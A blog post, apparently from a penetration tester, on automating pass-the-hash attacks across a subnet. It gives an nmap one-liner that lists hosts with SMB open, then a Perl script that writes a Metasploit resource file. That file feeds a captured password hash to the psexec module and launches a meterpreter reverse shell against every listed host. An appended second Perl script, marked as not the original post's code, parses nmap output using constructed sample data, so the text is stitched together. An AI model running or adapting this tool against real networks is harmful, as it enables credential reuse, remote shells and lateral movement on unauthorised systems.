So, I got some pretty harsh feedback from my first blog post. "You really suck at scripting", they said. "You're a script-kiddie's script-kiddie!", they yelled. "What if I wanted to pass a list of IPs, smart boy? How would you do that?" I tried not to get defensive and replied, "Jeez Mom, relax, I'll come up with a solution."
I've been using a perl script that lets me pass-the-hash against all IPs in a subnet range, but I updated it to read the RHOST values from a file instead. That way, once I have a hash I want to try, I can nmap the environment and collect only the hosts with the SMB port open to pass to the attack.
Start by pulling together the targets using nmap and the unix cut command:
nmap -p445 -Pn 192.168.1.1/24 -oG - | grep 445/open | cut -d' ' -f2 >> smb.txt
Then create the perl script that generates the MSF resource file (the script's output is the resource file, so redirect it to a file and load that file into msfconsole).
#!/usr/bin/perl
use strict;
use warnings;

# Target list produced by the nmap command above, one IP per line
my $input_file = "smb.txt";

# Module, credential and payload settings are emitted once at the top of the
# resource file; NAME, HASH and the LHOST placeholder must be filled in first
print "use windows/smb/psexec\n";
print "set SMBUser NAME\n";
print "set SMBPass HASH\n";
print "set PAYLOAD windows/meterpreter/reverse_tcp\n";
print "set LHOST XXX.XXX.XXX.XXX\n";
print "set LPORT 4444\n";

# One "set RHOST / exploit / sleep" block per target
open(my $in, '<', $input_file) or die "Cannot open $input_file: $!\n";
while (my $ip = <$in>) {
    chomp $ip;
    next if $ip =~ /^\s*$/;    # skip blank lines
    print "set RHOST $ip\n";
    print "exploit\n";
    print "sleep 2\n";
}
close($in);
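The grep/cut pipeline above works because field 2 of an nmap grepable (-oG) line is the host address, but it also matches "445/open" anywhere on the line and keeps duplicates. The following perl script is an added example, not the original post's code, that parses the "Host:" and "Ports:" fields of -oG output explicitly, keeps only hosts where 445/tcp is actually open, validates the IPv4 address and drops repeats. The script name parse_smb.pl and the sample scan lines are constructed for illustration.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Added example (not the original post's script): build the smb.txt target
# list from nmap -oG output. The lines in @sample are constructed to mimic
# grepable output; real output is read from STDIN when it is piped in.
my @sample = (
    "# Nmap 7.94 scan initiated (constructed sample)",
    "Host: 192.168.1.10 ()\tStatus: Up",
    "Host: 192.168.1.10 ()\tPorts: 445/open/tcp//microsoft-ds///",
    "Host: 192.168.1.11 ()\tPorts: 445/closed/tcp//microsoft-ds///",
    "Host: 192.168.1.12 (fileserver)\tPorts: 139/open/tcp//netbios-ssn///, 445/open/tcp//microsoft-ds///",
    "Host: 192.168.1.10 ()\tPorts: 445/open/tcp//microsoft-ds///",
    "Host: 999.168.1.13 ()\tPorts: 445/open/tcp//microsoft-ds///",
    "# Nmap done (constructed sample)",
);

# Return the unique, valid IPv4 hosts whose $port/tcp is reported open.
sub smb_hosts {
    my ($port, @lines) = @_;
    my %seen;
    my @hosts;
    for my $line (@lines) {
        next if $line =~ /^#/;                      # nmap header/footer lines
        # "Host: <addr> (<name>)<TAB>Ports: <list>" -- only lines with a Ports field
        my ($ip, $ports) = $line =~ /^Host:\s+(\S+)\s+\([^)]*\)\s+Ports:\s+(.*)$/
            or next;
        # Plain IPv4 only, every octet 0..255
        next unless $ip =~ /^\d{1,3}(?:\.\d{1,3}){3}$/;
        next if grep { $_ > 255 } split /\./, $ip;
        # Port entries are "port/state/proto//service///", comma separated
        my @open = grep { m{^\Q$port\E/open/tcp} } split /\s*,\s*/, $ports;
        next unless @open;
        push @hosts, $ip unless $seen{$ip}++;       # de-duplicate, keep order
    }
    return @hosts;
}

# Use piped-in nmap output if present, otherwise the constructed sample
my @lines = -t STDIN ? @sample : <STDIN>;
chomp @lines;
print "$_\n" for smb_hosts(445, @lines);
```

Run it as `nmap -p445 -Pn 192.168.1.1/24 -oG - | perl parse_smb.pl > smb.txt`; with the constructed sample it prints only 192.168.1.10 and 192.168.1.12, since the closed port, the repeated host and the malformed address are filtered out.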